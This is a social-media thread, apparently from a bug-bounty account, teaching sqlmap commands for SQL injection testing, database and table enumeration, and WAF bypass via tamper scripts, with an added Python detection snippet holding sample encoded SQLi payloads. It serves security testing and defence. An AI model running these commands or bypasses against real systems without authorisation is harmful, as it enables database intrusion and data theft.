Hey ReconOne fam! I've personally used Sqlmap on several occasions and it has proven to be a valuable tool in my security arsenal.
Let's dive into some of its features
👇🧵
#sqlmap #sqli #bugbountyhelp #bugbounty #AttackSurface
1/7 Sqlmap against a potentially vulnerable page
$ sqlmap -u 'https://example.com/page?id=1' -v 3
$ sqlmap -u https://example.com/list --data id=1
$ sqlmap -u https://example.com/internal --cookie='PHPSESSID=abcdef'
2/7 Test injection in a specific parameter
$ sqlmap -u 'https://example.com/page?id=1&page=4&sort=desc&env=*'
$ sqlmap -u https://example.com/form --data 'name=asd&page=4&role=admin' -p role
3/7 Tell sqlmap to use payloads for a specific database
$ sqlmap -u 'https://example.com/page?id=1' --dbms=MSSQL
$ sqlmap -u 'https://example.com/page?id=1' --dbms=MySQL
4/7 Use only specific techniques, such as Boolean-based blind (B) or time-based blind (T)
$ sqlmap -u 'https://example.com/page?id=3' --technique=BT
5/7 Enumerate the databases and their contents
$ sqlmap -u 'https://example.com/page?id=2*' --dbs --current-user
$ sqlmap -u 'https://example.com/page?id=2*' -D Database1 --tables
6/7 Example of tamper scripts to perform WAF bypass
$ sqlmap -u 'https://example.com/page?id=2*' --tamper=apostrophemask,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,percentage,randomcase,space2comment,space2randomblank,unmagicquotes
6.1/7 Example of Tamper script to perform WAF Bypass
A comprehensive explanation: medium.com/@drag0n/sqlmap…
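The tamper scripts listed in 6/7 change a payload's encoding, spacing and letter case, so a filter that decodes input only once can miss it. The Python below is an added example (not part of the original thread or of sqlmap) that canonicalizes a parameter value before matching; the signature list and sample values are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Small illustrative signature set (assumption); not a complete SQLi ruleset.
SIGNATURES = [
    re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    re.compile(r"\b(and|or)\s+\d+\s*(=|like)\s*\d+", re.I),
    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    re.compile(r"\bwaitfor\s+delay\b", re.I),
]

def canonicalize(value, max_rounds=5):
    """Undo layered encodings so every rule sees the same text."""
    for _ in range(max_rounds):  # bounded, so deep nesting cannot stall us
        # %uXXXX escapes (charunicodeencode) are not handled by unquote()
        step = re.sub(r"%u([0-9a-fA-F]{4})",
                      lambda m: chr(int(m.group(1), 16)), value)
        step = unquote(step)     # charencode / chardoubleencode layers
        if step == value:
            break
        value = step
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # space2comment
    return re.sub(r"\s+", " ", value).strip()             # space2randomblank

def matches(value):
    return any(sig.search(value) for sig in SIGNATURES)

def inspect(raw):
    """Return (hit after one URL-decode, hit after full canonicalization)."""
    return matches(unquote(raw)), matches(canonicalize(raw))

# Constructed values of an "id" parameter as they might appear in an access log.
SAMPLES = [
    "1",
    "1%20UNION%20SELECT%20NULL",
    "1%2520UNION%2520SELECT%2520NULL",
    "1/**/uNiOn/**/SeLeCt/**/NULL",
    "1%u0020AND%u0020SLEEP%u00285%u0029",
    "student%20union%20selection",  # benign text that must not match
]

if __name__ == "__main__":
    for raw in SAMPLES:
        single, full = inspect(raw)
        print(f"single-decode={single!s:5} canonical={full!s:5} {raw}")
```

Values where the two columns differ are the ones a decode-once filter lets through; the same canonicalization belongs in log-based detection as well as inline filtering.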
7/7 From Burp to Sqlmap
1. Take an HTTP request from Burp Suite -> right click -> save to file, e.g. "savedRequest.txt"
2. Launch sqlmap on it: sqlmap -r savedRequest.txt
That's all for this thread on Sqlmap! Thanks for following along.
Be sure to follow @ReconOne_bk for more informative threads on Recon, tools and techniques.
